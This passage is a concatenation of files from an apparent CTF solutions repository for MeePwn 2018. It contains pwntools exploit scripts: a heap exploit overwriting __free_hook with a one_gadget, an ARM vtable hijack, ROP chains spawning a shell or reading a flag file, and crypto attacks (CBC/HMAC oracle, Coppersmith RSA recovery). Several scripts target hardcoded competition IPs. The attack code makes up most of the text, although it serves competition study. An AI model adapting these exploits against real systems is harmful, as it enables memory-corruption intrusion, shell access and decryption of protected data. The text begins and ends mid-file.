args.R: LIBC64 = './libc.so.6' else: LIBC64 = '/lib/x86_64-linux-gnu/libc.so.6' if args.R: r = remote(TARGET[0], TARGET[1]) else: r = process(BINARY, env={'LD_PRELOAD':LIBC64}) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='b *0x%x' % addr) def malloc(size, data): r.sendlineafter('Your choice:', '1') r.sendlineafter('Size:', str(size)) r.sendafter('Data:', str(data)) def show(idx): r.sendlineafter('Your choice:', '2') r.sendlineafter('Index:', str(idx)) def free(idx): r.sendlineafter('Your choice:', '3') r.sendlineafter('Index:', str(idx)) code = ELF(BINARY) libc = ELF(LIBC64) #attach(0xe4b) malloc(0x810, 'x') # 0 malloc(0x410, 'xdd') # 1 malloc(0x100, 'barrier') # 2 # shrink heap free(0) malloc(0x108, 'a'*0x108) # 0 malloc(0x100, 'b1') # 3 # unlink malloc(0x100, 'b2') # 4 # free 3 for i in xrange(5): malloc(0x100, 'c') # 5,6,7,8,9 for i in xrange(6): free(9-i) free(2) free(3) free(1) # free xdd # leak malloc(0x100, 'x') # 1 malloc(0x100, 'x') # 2 malloc(0x90, 'y') # 3 malloc(0x90, 'y') # 4 malloc(0x60, 'y') # 5 show(2) libc.address = u64(r.recvuntil("\n")[:-1].ljust(8,"\x00")) - 0x3ebca0 log.info(hex(libc.address)) # edit malloc(0x200, 'a'*0x110 + p64(libc.sym['__free_hook'])) # 6 malloc(0x100, 'x') # 7 malloc(0x100, p64(libc.address + 0x4f322)) # 8 free(7) r.interactive() ================================================ FILE: 2018/meepwn-final-2018/crypto/esor/exp.py ================================================ __author__ = "polaris" from pwn import * #context.log_level = "debug" blocksize = 16 hmac_size = 20 def encrypt(prefix,suffix): r.sendline("1") r.recvuntil("prefix: ") r.sendline(prefix) r.recvuntil("suffix: ") r.sendline(suffix) data = r.recvline() r.recvuntil("3. quit") return data[:-1] def decrypt(data): r.sendline("2") r.recvuntil("data: ") r.sendline(data) data = r.recvline() r.recvuntil("3. quit") return data[:-1] def deal(data): #print data #print len(data) data = data.decode('hex') return (data[:blocksize],data[blocksize:]) """ for i in range(16): (iv,data) = deal(encrypt("A"*i,"")) print i,len(data) data+mac : 84 data : 64 11+xxxxx+1 = 96 (prefix+data+suffix)+hmac+padding """ flag = "rmup;thankyou-and-" for pos in range(48,64): i = 0 while True: print "=============",pos,"===========",i,"==========" print "*******************",flag,"*******************" i+=1 r = remote("206.189.92.209",54321) r.recvuntil("3. quit") (iv,data) = deal(encrypt("A"*12+(64-pos)*"A","A"*pos)) #print (iv+data).encode("hex") new_data = data[:-blocksize]+data[4*blocksize:5*blocksize] #print (iv+new_data).encode("hex") #res = decrypt((iv+data).encode("hex")) #assert("OK" in res) res = decrypt((iv+new_data).encode("hex")) if "KO" not in res: aaa = 15^ord(data[-2*blocksize:-blocksize][-1])^ord(data[3*blocksize:4*blocksize][-1]) print chr(aaa) flag+=chr(aaa) print "*******************",flag,"*******************" r.close() break r.close() #print i,decrypt((iv+data).encode("hex")) ================================================ FILE: 2018/meepwn-final-2018/crypto/esor/exp2.py ================================================ __author__ = "polaris" from pwn import * #context.log_level = "debug" blocksize = 16 hmac_size = 20 def encrypt(prefix,suffix): r.sendline("1") r.recvuntil("prefix: ") r.sendline(prefix) r.recvuntil("suffix: ") r.sendline(suffix) data = r.recvline() r.recvuntil("3. quit") return data[:-1] def decrypt(data): r.sendline("2") r.recvuntil("data: ") r.sendline(data) data = r.recvline() r.recvuntil("3. quit") return data[:-1] def deal(data): #print data #print len(data) data = data.decode('hex') return (data[:blocksize],data[blocksize:]) """ for i in range(16): (iv,data) = deal(encrypt("A"*i,"")) print i,len(data) data+mac : 84 data : 64 11+xxxxx+1 = 96 (prefix+data+suffix)+hmac+padding """ #flag = "MeePwnCTF{this-chall-is-just-a-warmup;thankyou-and-apologize-XD}" flag = "ologize-X" for pos in range(55,64): i = 0 while True: print "=============",pos,"===========",i,"==========" print "*******************",flag,"*******************" i+=1 r = remote("206.189.92.209",54321) r.recvuntil("3. quit") (iv,data) = deal(encrypt("A"*12+(64-pos)*"A","A"*pos)) #print (iv+data).encode("hex") new_data = data[:-blocksize]+data[4*blocksize:5*blocksize] #print (iv+new_data).encode("hex") #res = decrypt((iv+data).encode("hex")) #assert("OK" in res) res = decrypt((iv+new_data).encode("hex")) if "KO" not in res: aaa = 15^ord(data[-2*blocksize:-blocksize][-1])^ord(data[3*blocksize:4*blocksize][-1]) print chr(aaa) flag+=chr(aaa) print "*******************",flag,"*******************" r.close() break r.close() #print i,decrypt((iv+data).encode("hex")) ================================================ FILE: 2018/meepwn-final-2018/crypto/esor/src.py ================================================ #!/usr/bin/python2 from Crypto.Cipher import AES import hmac, hashlib import os import sys menu = """Choose one: 1. encrypt data 2. decrypt data 3. quit """ class Unbuffered(object): def __init__(self, stream): self.stream = stream def write(self, data): self.stream.write(data) self.stream.flush() def __getattr__(self, attr): return getattr(self.stream, attr) sys.stdout = Unbuffered(sys.stdout) sys.stderr = None encrypt_key = '\xff' * 32 #i fix it!!! secret = 'MeePwnCTF{#flag_here#}' hmac_secret = '' #i fix it tooo!!! blocksize = 16 hmac_size = 20 def pad(msg): padlen = blocksize - (len(msg) % blocksize) - 1 return os.urandom(padlen) + chr(padlen) def unpad(msg): return msg[:-(ord(msg[-1]) + 1)] def compute_hmac(msg): return hmac.new(hmac_secret, msg, digestmod=hashlib.sha1).digest() def encrypt(prefix='', suffix=''): _enc = prefix + secret + suffix _enc+= compute_hmac(_enc) _enc+= pad(_enc) iv = os.urandom(16) _aes = AES.new(encrypt_key, AES.MODE_CBC, iv) return (iv + _aes.encrypt(_enc)).encode('hex') def decrypt(data): data = data.decode('hex') try: iv = data[:blocksize] _aes = AES.new(encrypt_key, AES.MODE_CBC, iv) data = _aes.decrypt(data[blocksize:]) data = unpad(data) plaintext = data[:-hmac_size] mac = data[-hmac_size:] if mac == compute_hmac(plaintext): return True else: return False except: return False print """Welcome to our super secure enc/dec server. We use hmac, so, plz don't hack us (and you can't). Thanks.""" while True: choice = int(raw_input(menu)) if choice == 1: _pre = raw_input('prefix: ') _suf = raw_input('suffix: ') print encrypt(prefix=_pre, suffix=_suf) elif choice == 2: _data = raw_input('data: ') if decrypt(_data): print 'OK' else: print 'KO' elif choice == 3: sys.exit(0) else: choice = int(raw_input(menu)) ================================================ FILE: 2018/meepwn-final-2018/pwn/babyarm/exp.py ================================================ #!/usr/bin/env python2.7 # -*- coding: utf-8 -*- from pwn import * from time import sleep __author__ = 'luckasdf0' # Settings context.terminal = ['tmux', 'splitw', '-h'] context.os = 'linux' context.arch = 'arm' # Global EXEC = 0x0000555555554000 PROG = "./babyarm" LIBC = "./libc.so.6" elf = ELF(PROG) libc = ELF(LIBC) #io = process("./run.sh") io = remote("51.15.131.72", 9999) # gdb def attach(addr): log.info('b *0x%x' % (addr)) raw_input() def add(idx, content): io.recvuntil('Your choice:') io.sendline('1') io.recvuntil('Index:') io.sendline(str(idx)) io.recvuntil('Content:') io.send(content) def show(idx): io.recvuntil('Your choice:') io.sendline('2') io.recvuntil('Index:') io.sendline(str(idx)) def dele(idx): io.recvuntil('Your choice:') io.sendline('3') io.recvuntil('Index:') io.sendline(str(idx)) def info(): io.recvuntil('Your choice:') io.sendline('4') io.recvuntil('Your name:') io.send('A'*0x40) add(0, '0'*0xff+'\n') add(1, '1'*0xff+'\n') add(2, '1'*0xff+'\n') add(3, '1'*0xff+'\n') dele(0) dele(2) #libc_base = 0xf66d9000 #attach(0x10902) add(0, 'A') sleep(0.2) show(0) io.recvuntil(": ") main_arena = u32(io.recv(4))-0x41+0xcc heap_base = u32(io.recv(3).ljust(0x4, '\x00'))-0x210 libc_base = main_arena-0xe87cc log.info(hex(main_arena)) log.info(hex(heap_base)) log.info(hex(libc_base)) off_stdout_vtable = 0xe8df0 libc_stdout_vtable = libc_base+off_stdout_vtable log.info(hex(libc_stdout_vtable)) #raw_input() #one_gadget = libc_base+0x2C635 #one_gadget = libc_base+0x462F1 #one_gadget = libc_base+0x84CC3 one_gadget = libc_base+0x462f0+1 log.info(hex(one_gadget)) vtable = '' #vtable += p32(0xdeadbeef)*0x3f vtable += p32(one_gadget)*0x3f add((libc_stdout_vtable-0x2106C-0x100000000)/4, vtable+'\n') io.interactive() ================================================ FILE: 2018/meepwn-final-2018/pwn/babyarm/gdb.sh ================================================ gdb-multiarch -ex "set architecture arm" -ex "target remote 0:1234" ================================================ FILE: 2018/meepwn-final-2018/pwn/babyarm/run.sh ================================================ #!/bin/sh qemu-arm -g 1234 -L ./ ./babyarm #qemu-arm -L /usr/arm-linux-gnueabihf ./babyarm ================================================ FILE: 2018/meepwn-final-2018/pwn/emu8/exp.py ================================================ from pwn import * import time import libtmux __author__ = 'b1gtang' timeout = 0.3 # 1 if a >= 0x3d8: a -= 1 # 2 a += 1 # 3 [a] += 1 # 4 [a] -= 1 # 5 print [a] # 6 write [a] # 7 if [a] == 0: skip until 0x8 # 8 if [a] != 0: skip until 0x7 # 0 exit p = '' p += '1' # i = 0x3b7 p += '6' # i = 0x3b2 p += '6' # 13 p += '26' # b8 p += '2' # i = 0x3b p += '2' # i = 0x3b p += '2626'*24 p += '0e' print p q = '' q += 'b4' q += '13b8' q += '6500' # ld v5, 0 b8 q += '6401' # ld v4, 1 q += '6300' # ld v3, 0 bc q += '60ff' # ld v0, 0xff # label3 q += '617e' # ld v1, 0x7e c0 q += '6200' # ld v2, 0x0 # i q += '8543' # xor v5, v4 c4 q += 'a000' # ld i, 0 q += 'f31e' # ad i, v3 c8 q += '4218' # sne v2, 0x18 # label 2 q += '13d4' # jp label1 cc q += 'f01e' # add i, v0 q += '7201' # add v2, 1 d0 q += '13ca' # jp label 2 q += 'f11e' # add i, v1 # label 1 d4 q += '4500' # sne v5, 0 q += '13de' # jmp label4 d8 q += '231c' # call w q += '13be' # jmp label3 dc q += '235a' # call r # label 4 q += '7301' # add v3, 1 e0 q += '3318' # se v3, 0x18 q += '13be' # jmp label 3 e4 q += '00fd' # exit print q import libtmux # tmux new-session -s foo -n bar server = libtmux.Server() session = server.find_where({ "session_name": "foo" }) window = session.attached_window pane = window.attached_pane #pane.send_keys('./emu8') for i in p: log.info(i) time.sleep(timeout) pane.send_keys(i) for i in q: log.info(i) time.sleep(timeout) pane.send_keys(i) payload = p64(0x402803) # pop rdi; ret for i in payload.encode('hex'): log.info(i) time.sleep(timeout) pane.send_keys(i) leak = int(raw_input('input leak: ').strip(), 16) libc = ELF('./libc.so.6') libc.address = leak-0x20830 payload = '' payload += p64(libc.search('/bin/sh\x00').next()) payload += p64(libc.sym['system']) for i in payload.encode('hex'): log.info(i) time.sleep(timeout) pane.send_keys(i) # MeePwnCTF{t3di0us_ch4ll3nge} # MeePwnCTF{emu_in_emu} ================================================ FILE: 2018/meepwn-final-2018/pwn/jump/exp.py ================================================ __author__ = 'b1gtang' from pwn import * context.terminal = ['tmux', 'splitw', '-h'] context.arch='amd64' r = None def init(binary, host, port, R=True, E=False): global r if E: # or R: libc64 = './libc-2.27.so' else: libc64 = '/lib/x86_64-linux-gnu/libc.so.6' if R: r = remote(host, port) else: r = process(binary, env={'LD_PRELOAD':libc64}) return ELF(binary), ELF(libc64) def attach(addr): if addr <= 0x400000: addr = addr + 0x555555554000 gdb.attach(r, gdbscript='set disassemble-next-line on\nb *0x%x' % addr) def exploit(host): while True: #code, libc = init('./jump', '178.128.217.117', 31336, R=False) code, libc = init('./jump', '178.128.217.117', 31336) #attach(0xd12) r.recvuntil('Give me input:') r.sendline('a'*1016+'\xe0\x4c') try: r.recvuntil('a'*1016, timeout=2) except: print '1 stage failed' r.close() continue code.address = u64(r.recv(6).ljust(8, '\x00'))-0xce0 log.info(hex(code.address)) r.send(fit({0x3f8-0x130+8:code.address+0xce0},length=1016)+p64(code.address+0xcee)) r.sendline('\xa8\x89') try: libc.address = u64(r.recv(6).ljust(8, '\x00'))-0x3ebcb0 log.info(hex(libc.address)) except: print '3 stage failed' r.close() continue #r.send(fit({0x3f8-0x130+8:code.address+0xce0},length=1016)+p64(code.address+0xcee)) r.send(p64(code.address+0xce0)*127+p64(code.address+0xcee)) r.sendline('\xa0\x89') heap = u64(r.recv(6).ljust(8, '\x00'))-0x1670 log.info(hex(heap)) # #attach(0xd12) r.send('/home/jump/flag\x00'+p64(code.address+0xd33)*125+p64(code.address+0xcee)) try: p = '' p += p64(libc.address + 0x28597)#pop rdi p += p64(heap+0x19a0) p += p64(libc.address + 0x1306d9)#pop rsi p += p64(0) p += p64(0) p += p64(libc.address+0x439c8) p += p64(2) p += p64(libc.address+0xe58e5) # read p += p64(libc.address + 0x28597)#pop rdi p += p64(3) p += p64(libc.address + 0x1306d9)#pop rsi p += p64(0x20) p += p64(heap+0x19a0) p += p64(libc.address+0x439c8) p += p64(0) p += p64(libc.address+0xe58e5) # puts p += p64(libc.address + 0x28597)#pop rdi p += p64(heap+0x19a0) p += p64(code.address+0x920) except: print '2 stage failed' r.close() continue r.sendline(p64(heap+0x19a0-0x10)+p+'y'*0x40) flag = r.recvline().strip('\n') print flag # MeePwnCTF{J4mp_J4mp_J4mp:v:v} break if __name__ == '__main__': host = '127.0.0.1' exploit(host) r.interactive() ================================================ FILE: 2018/meepwn-quals-2018/crypto/bazik/exp.py ================================================ from pwn import * from Crypto.PublicKey import RSA from Crypto.Util.number import long_to_bytes,bytes_to_long from gmpy2 import iroot #r = remote("178.128.17.82",31333) public_key = RSA.importKey(open('key.pub', 'r').read()) print public_key.n print public_key.e n = public_key.n e = public_key.e """ data = "Your OTP for transaction #731337 in ABCXYZ Bank is 678637830." print hex(bytes_to_long(data)) data = "Your OTP for transaction #731337 in ABCXYZ Bank is 797953094." print hex(bytes_to_long(data)) """ """ c = 0x67b8a854c0b75bfe36eafa5306cef4b5e127fd99ae30594f7a5b3605bd2e497e399ad202c2279df8a9d5ff56f85fbbc8379d88e02f3e366245ee3b949d6fb70749d8a84cfb96964057e4783c4b78324e070d89049da7fb8bf49f91d63d804e63f84489a3fdb8792a86928fcc512df5f4c7bfdc5102be5c7603964a717d9a3dc8 """ """ data = c i=0 while 1: res = iroot(data,3) if(res[1] == True): print res break if i%10000==0: print "i="+str(i) data+=n i+=1 """ ================================================ FILE: 2018/meepwn-quals-2018/crypto/bazik/key.pub ================================================ -----BEGIN PUBLIC KEY----- MIGdMA0GCSqGSIb3DQEBAQUAA4GLADCBhwKBgQCjw0g5CdueaWVb3KR6O7FQd6Oa 8UTaMeR55lXFbbf+Nj0IOvR9Bn/yRZKMQ58SN9o0aHTtZtSves5GYJZx7mWD4HAe OCoD22nRS7AOvr6Zrtl3zrD5+7NMI/6FOzVuSF6BHo67GyO7UKDTNfGiMAXLLE/H PmG0fWW0mzB8gpBy6QIBAw== -----END PUBLIC KEY----- ================================================ FILE: 2018/meepwn-quals-2018/crypto/bazik/solve.py ================================================ debug = True # display matrix picture with 0 and X def matrix_overview(BB, bound): for ii in range(BB.dimensions()[0]): a = ('%02d ' % ii) for jj in range(BB.dimensions()[1]): a += '0' if BB[ii,jj] == 0 else 'X' a += ' ' if BB[ii, ii] >= bound: a += '~' print a def coppersmith_howgrave_univariate(pol, modulus, beta, mm, tt, XX): """ Coppersmith revisited by Howgrave-Graham finds a solution if: * b|modulus, b >= modulus^beta , 0 < beta <= 1 * |x| < XX """ # # init # dd = pol.degree() nn = dd * mm + tt # # checks # if not 0 < beta <= 1: raise ValueError("beta should belongs in (0, 1]") if not pol.is_monic(): raise ArithmeticError("Polynomial must be monic.") # # calculate bounds and display them # """ * we want to find g(x) such that ||g(xX)|| <= b^m / sqrt(n) * we know LLL will give us a short vector v such that: ||v|| <= 2^((n - 1)/4) * det(L)^(1/n) * we will use that vector as a coefficient vector for our g(x) * so we want to satisfy: 2^((n - 1)/4) * det(L)^(1/n) < N^(beta*m) / sqrt(n) so we can obtain ||v|| < N^(beta*m) / sqrt(n) <= b^m / sqrt(n) (it's important to use N because we might not know b) """ if debug: # t optimized? print "\n# Optimized t?\n" print "we want X^(n-1) < N^(beta*m) so that each vector is helpful" cond1 = RR(XX^(nn-1)) print "* X^(n-1) = ", cond1 cond2 = pow(modulus, beta*mm) print "* N^(beta*m) = ", cond2 print "* X^(n-1) < N^(beta*m) \n-> GOOD" if cond1 < cond2 else "* X^(n-1) >= N^(beta*m) \n-> NOT GOOD" # bound for X print "\n# X bound respected?\n" print "we want X <= N^(((2*beta*m)/(n-1)) - ((delta*m*(m+1))/(n*(n-1)))) / 2 = M" print "* X =", XX cond2 = RR(modulus^(((2*beta*mm)/(nn-1)) - ((dd*mm*(mm+1))/(nn*(nn-1)))) / 2) print "* M =", cond2 print "* X <= M \n-> GOOD" if XX <= cond2 else "* X > M \n-> NOT GOOD" # solution possible? print "\n# Solutions possible?\n" detL = RR(modulus^(dd * mm * (mm + 1) / 2) * XX^(nn * (nn - 1) / 2)) print "we can find a solution if 2^((n - 1)/4) * det(L)^(1/n) < N^(beta*m) / sqrt(n)" cond1 = RR(2^((nn - 1)/4) * detL^(1/nn)) print "* 2^((n - 1)/4) * det(L)^(1/n) = ", cond1 cond2 = RR(modulus^(beta*mm) / sqrt(nn)) print "* N^(beta*m) / sqrt(n) = ", cond2 print "* 2^((n - 1)/4) * det(L)^(1/n) < N^(beta*m) / sqrt(n) \n-> SOLUTION WILL BE FOUND" if cond1 < cond2 else "* 2^((n - 1)/4) * det(L)^(1/n) >= N^(beta*m) / sqroot(n) \n-> NO SOLUTIONS MIGHT BE FOUND (but we never know)" # warning about X print "\n# Note that no solutions will be found _for sure_ if you don't respect:\n* |root| < X \n* b >= modulus^beta\n" # # Coppersmith revisited algo for univariate # # change ring of pol and x polZ = pol.change_ring(ZZ) x = polZ.parent().gen() # compute polynomials gg = [] for ii in range(mm): for jj in range(dd): gg.append((x * XX)**jj * modulus**(mm - ii) * polZ(x * XX)**ii) for ii in range(tt): gg.append((x * XX)**ii * polZ(x * XX)**mm) # construct lattice B BB = Matrix(ZZ, nn) for ii in range(nn): for jj in range(ii+1): BB[ii, jj] = gg[ii][jj] # display basis matrix if debug: matrix_overview(BB, modulus^mm) # LLL BB = BB.LLL() # transform shortest vector in polynomial new_pol = 0 for ii in range(nn): new_pol += x**ii * BB[0, ii] / XX**ii # factor polynomial potential_roots = new_pol.roots() print "potential roots:", potential_roots # test roots roots = [] for root in potential_roots: if root[0].is_integer(): result = polZ(ZZ(root[0])) if gcd(modulus, result) >= modulus^beta: roots.append(ZZ(root[0])) # return roots # RSA gen options (for the demo) length_N = 1024 # size of the modulus Kbits = 487 # size of the root e = 3 N = 114998163541608719472597269021968788332417041467219617018528833624282336057557623978369897447864293846590876396661233716196664218014886425660043372788694792857217077006432513731806612203028066086729197709165692319741564171073873953231638597366034293227729785693587199563920036861369648528848202680381484331753 ZmodN = Zmod(N); C = 0xa19be1460fae9be9eccb24e973c197e6e34ee830342ff3d67ed62a5a9b396999c51e9d80d668dc2e89c327b3eac2eb74af05e63dcdf69110b80433d31a9a3ad7ab6d5e5b08afced6ba0133a1658d3c709002c75949606b65f0bb3994754edbdfa574179609b0cb86e4ad9482674ecd49622f0560086d151523fb0221fd19b165 pre = 0b1011001011011110111010101110010001000000100111101010100010100000010000001100110011011110111001000100000011101000111001001100001011011100111001101100001011000110111010001101001011011110110111000100000001000110011011100110011001100010011001100110011001101110010000001101001011011100010000001000001010000100100001101011000010110010101101000100000010000100110000101101110011010110010000001101001011100110010000000000000000000000000000000000000000000000000000000000000000000000000000000000000 # Create problem (for the demo) #K = ZZ.random_element(0, 2^Kbits) #Kdigits = K.digits(2) #M = [0]*Kbits + [1]*(length_N-Kbits); #for i in range(len(Kdigits)): # M[i] = Kdigits[i] #M = ZZ(M, 2) #C = ZmodN(M)^e # Problem to equation (default) P. = PolynomialRing(ZmodN) #, implementation='NTL') pol = (pre + x)^e - C dd = pol.degree() # Tweak those beta = 1 # b = N epsilon = beta / 7 # <= beta / 7 mm = ceil(beta**2 / (dd * epsilon)) # optimized value tt = floor(dd * mm * ((1/beta) - 1)) # optimized value XX = ceil(N**((beta**2/dd) - epsilon)) # optimized value # Coppersmith roots = coppersmith_howgrave_univariate(pol, N, beta, mm, tt, XX) # output print "we found:", str(roots) ================================================ FILE: 2018/meepwn-quals-2018/crypto/bazik/solve.sage ================================================ import time debug = True # display matrix picture with 0 and X def matrix_overview(BB, bound): for ii in range(BB.dimensions()[0]): a = ('%02d ' % ii) for jj in range(BB.dimensions()[1]): a += '0' if BB[ii,jj] == 0 else 'X' a += ' ' if BB[ii, ii] >= bound: a += '~' print a def coppersmith_howgrave_univariate(pol, modulus, beta, mm, tt, XX): """ Coppersmith revisited by Howgrave-Graham finds a solution if: * b|modulus, b >= modulus^beta , 0 < beta <= 1 * |x| < XX """ # # init # dd = pol.degree() nn = dd * mm + tt # # checks # if not 0 < beta <= 1: raise ValueError("beta should belongs in (0, 1]") if not pol.is_monic(): raise ArithmeticError("Polynomial must be monic.") # # calculate bounds and display them # """ * we want to find g(x) such that ||g(xX)|| <= b^m / sqrt(n) * we know LLL will give us a short vector v such that: ||v|| <= 2^((n - 1)/4) * det(L)^(1/n) * we will use that vector as a coefficient vector for our g(x) * so we want to satisfy: 2^((n - 1)/4) * det(L)^(1/n) < N^(beta*m) / sqrt(n) so we can obtain ||v|| < N^(beta*m) / sqrt(n) <= b^m / sqrt(n) (it's important to use N because we might not know b) """ if debug: # t optimized? print "\n# Optimized t?\n" print "we want X^(n-1) < N^(beta*m) so that each vector is helpful" cond1 = RR(XX^(nn-1)) print "* X^(n-1) = ", cond1 cond2 = pow(modulus, beta*mm) print "* N^(beta*m) = ", cond2 print "* X^(n-1) < N^(beta*m) \n-> GOOD" if cond1 < cond2 else "* X^(n-1) >= N^(beta*m) \n-> NOT GOOD" # bound for X print "\n# X bound respected?\n" print "we want X <= N^(((2*beta*m)/(n-1)) - ((delta*m*(m+1))/(n*(n-1)))) / 2 = M" print "* X =", XX cond2 = RR(modulus^(((2*beta*mm)/(nn-1)) - ((dd*mm*(mm+1))/(nn*(nn-1)))) / 2) print "* M =", cond2 print "* X <= M \n-> GOOD" if XX <= cond2 else "* X > M \n-> NOT GOOD" # solution possible? print "\n# Solutions possible?\n" detL = RR(modulus^(dd * mm * (mm + 1) / 2) * XX^(nn * (nn - 1) / 2)) print "we can find a solution if 2^((n - 1)/4) * det(L)^(1/n) < N^(beta*m) / sqrt(n)" cond1 = RR(2^((nn - 1)/4) * detL^(1/nn)) print "* 2^((n - 1)/4) * det(L)^(1/n) = ", cond1 cond2 = RR(modulus^(beta*mm) / sqrt(nn)) print "* N^(beta*m) / sqrt(n) = ", cond2 print "* 2^((n - 1)/4) * det(L)^(1/n) < N^(beta*m) / sqrt(n) \n-> SOLUTION WILL BE FOUND" if cond1 < cond2 else "* 2^((n - 1)/4) * det(L)^(1/n) >= N^(beta*m) / sqroot(n) \n-> NO SOLUTIONS MIGHT BE FOUND (but we never know)" # warning about X print "\n# Note that no solutions will be found _for sure_ if you don't respect:\n* |root| < X \n* b >= modulus^beta\n" # # Coppersmith revisited algo for univariate # # change ring of pol and x polZ = pol.change_ring(ZZ) x = polZ.parent().gen() # compute polynomials gg = [] for ii in range(mm): for jj in range(dd): gg.append((x * XX)**jj * modulus**(mm - ii) * polZ(x * XX)**ii) for ii in range(tt): gg.append((x * XX)**ii * polZ(x * XX)**mm) # construct lattice B BB = Matrix(ZZ, nn) for ii in range(nn): for jj in range(ii+1): BB[ii, jj] = gg[ii][jj] # display basis matrix if debug: matrix_overview(BB, modulus^mm) # LLL BB = BB.LLL() # transform shortest vector in polynomial new_pol = 0 for ii in range(nn): new_pol += x**ii * BB[0, ii] / XX**ii # factor polynomial potential_roots = new_pol.roots() print "potential roots:", potential_roots # test roots roots = [] for root in potential_roots: if root[0].is_integer(): result = polZ(ZZ(root[0])) if gcd(modulus, result) >= modulus^beta: roots.append(ZZ(root[0])) # return roots ############################################ # Test on Stereotyped Messages ########################################## print "//////////////////////////////////" print "// TEST 1" print "////////////////////////////////" # RSA gen options (for the demo) length_N = 1024 # size of the modulus Kbits = 200 # size of the root e = 3 # RSA gen (for the demo) p = next_prime(2^int(round(length_N/2))) q = next_prime(p) N = p*q ZmodN = Zmod(N); # Create problem (for the demo) K = ZZ.random_element(0, 2^Kbits) Kdigits = K.digits(2) M = [0]*Kbits + [1]*(length_N-Kbits); for i in range(len(Kdigits)): M[i] = Kdigits[i] M = ZZ(M, 2) C = ZmodN(M)^e # Problem to equation (default) P. = PolynomialRing(ZmodN) #, implementation='NTL') pol = (2^length_N - 2^Kbits + x)^e - C dd = pol.degree() # Tweak those beta = 1 # b = N epsilon = beta / 7 # <= beta / 7 mm = ceil(beta**2 / (dd * epsilon)) # optimized value tt = floor(dd * mm * ((1/beta) - 1)) # optimized value XX = ceil(N**((beta**2/dd) - epsilon)) # optimized value # Coppersmith start_time = time.time() roots = coppersmith_howgrave_univariate(pol, N, beta, mm, tt, XX) # output print "\n# Solutions" print "we want to find:",str(K) print "we found:", str(roots) print("in: %s seconds " % (time.time() - start_time)) print "\n" ############################################ # Test on Factoring with High Bits Known ########################################## print "//////////////////////////////////" print "// TEST 2" print "////////////////////////////////" # RSA gen length_N = 1024; p = next_prime(2^int(round(length_N/2))); q = next_prime( round(pi.n()*p) ); N = p*q; # qbar is q + [hidden_size_random] hidden = 200; diff = ZZ.random_element(0, 2^hidden-1) qbar = q + diff; F. = PolynomialRing(Zmod(N), implementation='NTL'); pol = x - qbar dd = pol.degree() # PLAY WITH THOSE: beta = 0.5 # we should have q >= N^beta epsilon = beta / 7 # <= beta/7 mm = ceil(beta**2 / (dd * epsilon)) # optimized tt = floor(dd * mm * ((1/beta) - 1)) # optimized XX = ceil(N**((beta**2/dd) - epsilon)) # we should have |diff| < X # Coppersmith start_time = time.time() roots = coppersmith_howgrave_univariate(pol, N, beta, mm, tt, XX) # output print "\n# Solutions" print "we want to find:", qbar - q print "we found:", roots print("in: %s seconds " % (time.time() - start_time)) ================================================ FILE: 2018/meepwn-quals-2018/crypto/bitbitbit/README.md ================================================ # Writeup 1. list all possible value of `(p - q)&(2^t2-1)`, namely `gamma-2000 ~ gamma+2000` 2. solve the equation `x * (x + g) == n mod (2^t2)` and get the low bits of p and q 3. use Known Low bits of Factor Attack to factor n 4. decrypt flag with private key ================================================ FILE: 2018/meepwn-quals-2018/crypto/bitbitbit/midbit.py ================================================ #!/usr/bin/env python2 # from flag import FLAG from gmpy2 import next_prime, powmod from random import randint, getrandbits from hashlib import sha512, sha256 from os import urandom introduction = """ .--. .-------------------------------. | _| | | | O O < Hey man, wanna mid some bit ? | | | | | | || | / `-------------------------------' |`-'| `---' Whoever says live is simple, is the one never actually live. :)) """ def pad(num, length): result = bin(num).lstrip('0b').strip('L') result = result + '0' * (length - len(result)) return int(result, 2) def xor(a, b): return ''.join(chr(ord(i) ^ ord(j)) for i, j in zip(a, b)) def gen_key(): t1 = randint(768, 928) t2 = 1024 - t1 if t1 > t2: t1, t2 = t2, t1 assert t1 < t2 p2 = pad(getrandbits(1024 - t2) << t2, 1024) p0 = pad(getrandbits(t1), t1) q2 = pad(getrandbits(1024 - t2) << t2, 1024) q0 = pad(getrandbits(t1), t1) r = pad(getrandbits(t2 - t1) << t1, t2) p = next_prime((p2 ^ r ^ p0)) q = next_prime((q2 ^ r ^ q0)) N = p * q print 'p =', p print 'q =', q return N, t2 - t1, p0 - q0 def proof_of_shit(): """ This function has very special purpose :)) Simply to screw you up """ raw = urandom(6) print 'prefix = {}'.format(raw.encode('hex')) challenge = raw_input('Challenge: ') temp = sha256(raw + challenge).hexdigest() if temp.startswith('25455'): return True else: return False if __name__ == "__main__": try: ''' assert proof_of_shit() == True ''' N, delta, gamma = gen_key() # m = int(FLAG.encode('hex'), 16) # c = powmod(m, 0x10001, N) # print introduction print 'N = {}'.format(N) print 'delta = {}'.format(delta) print 'gamma = {}'.format(gamma) # print 'ciphertext = {}'.format(c) except AssertionError: print "Take your time and think of the inputs." ================================================ FILE: 2018/meepwn-quals-2018/crypto/bitbitbit/solve.sage ================================================ # n = 20693300621338263534560609109464045006147969931992337541749057866556383710608500686158118153024636004958845212256080054190457498273079568214789249722382057244858110528880978984262396826483486960796447524091269709040411029186173343224863590933385009297165441741222704775965315685656770975060156899530339910612836598393780018347442836625375129069373628621335300662713593334102767865417395242014721478539931126725049820283224116587893415787160087455134250238256165719220929229370545070057138206724778933005907131637620954213217076383290502144222010195403974326327554803068193543309741224437746561252495013553800046721737 # t2 = 820 # t1 = 1024 - t2 # g = 1356576013631814339759105361141616188752282630425597137563229 n = 20658539604877761050678801630864553684691924015340818582033943215336021271241523207301526551031759877723763213858857256012005872876527086212782382747743153859999766070805468009813753774458866664853215343408723811758537141521678487298977376217773633027585619650112059070422617519641618778063814236955944784876563114191642188773348137035314128890851568057842806286204535449260513363513782304461785184302678061697273081648710987909148680238536802718340701848281749317987344911434878488284869227795792706075550534807516929611056284343386953830554473234182474405415175074734080283687254281084250177878324218977072329705463 t1 = 231 t2 = 1024-231 g = 748605525135410563041437379140027861196744884219358105597761914385566 ''' n = 17901835399384714624597700477671879960832586181181560200630486819367558375800091468911915201351094519477945043511900203562021349580937591306714890171776169479274874979355387938075238894673965058543972431577694255937621288018782731432725799599379702044321827805272175232071473056075462446651651237082130144011336011293263845084350522419401246413644950806428351784404952828872588408642557596057300468712070981946876585673659512796515099415644054497861256188872220952127219891562919799070122760975326414666914049018546169452665192104520566379942629165236994651363811487281781175381886916111946907913932424083088833387551 t2 = 911 t1 = 113 g = 3386816756986656655497580780424510 ''' m1 = 2^t1 - 1 m2 = 2^t2 - 1 P. = Zmod(n)[] n1 = n & m1 n2 = n & m2 var('x') def 